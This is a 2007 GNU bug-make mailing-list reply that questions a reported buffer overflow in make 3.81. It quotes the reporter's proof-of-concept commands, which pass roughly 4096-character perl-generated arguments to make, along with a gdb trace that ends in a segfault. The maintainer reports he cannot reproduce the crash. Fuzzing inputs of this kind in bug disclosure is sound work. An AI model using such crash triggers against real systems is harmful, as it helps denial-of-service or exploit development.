RE: make multiple buffer overflow

Thu, 06 Dec 2007 06:47:48 -0800 

On 06 December 2007 05:09, laurent gaffie wrote:

> Application: Make <= 3.81
> Web Site: http://savannah.gnu.org/projects/make/ &
> http://www.gnu.org/software/make/ 
> Platform: Unix
> Bug:multiple buffer overflow

> Proof of concept example :
> make `perl -e 'print"A"x4096'` //***
> make -f `perl -e 'print"A"x4096'`
> make -j `perl -e 'print"A"x4096'`
> make -i `perl -e 'print"A"x4096'`
> make -l `perl -e 'print"A"x4096'`
> 
> *** depending the case , you'll need to change  the value ,  for a couple
> of more  A , playing by  hundred should be good to make sure you trigger it 

  I couldn't reproduce any of these, on either Linux or Cygwin, on 3.80 or
3.81 (although I didn't try absolutely every possible combination there).  I
get lots of "stat: AAAAAA[...]AAAA: File name too long" and "No rule to make
target `AAAAA[..]AAAA'" messages instead.


> [EMAIL PROTECTED]:~# gdb make
> GNU gdb 6.6-debian
> Copyright (C) 2006 Free Software Foundation, Inc.

  Is it possible that debian's distro has a customised version of make?  Did
you build make from CVS sources or tarballs?  I see you've got no stack
backtrace in your debug output, if you did build your own you'd get symbol
info.


> (gdb) run `perl -e 'print"A"x4296'`//my GCC version have a protection for
> stack smashing then 200 chars more , and we trigger it 

  Hmm, perhaps the stack smashing protection is generating a false positive?
I guess this implies that you /are/ building make from sources, yes?

> Starting program: /usr/bin/make `perl -e 'print"A"x4296'`
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> [Thread debugging using libthread_db enabled]
> [New Thread -1209637200 (LWP 1246)]
> make: stat: AAAAAAAAAAAAAAAAAAAAAAAA....AAAAAAA
> AAAAA.........AAAAAAAAAA....

  That's the kind of message I see from make...

> Program received signal SIGSEGV, Segmentation fault.

... but I don't get a SEGV.  Can you try it again without stack protection?

    cheers,
      DaveK
-- 
Can't think of a witty .sigline today....



_______________________________________________
Bug-make mailing list
Bug-make@gnu.org
http://lists.gnu.org/mailman/listinfo/bug-make

Reply via email to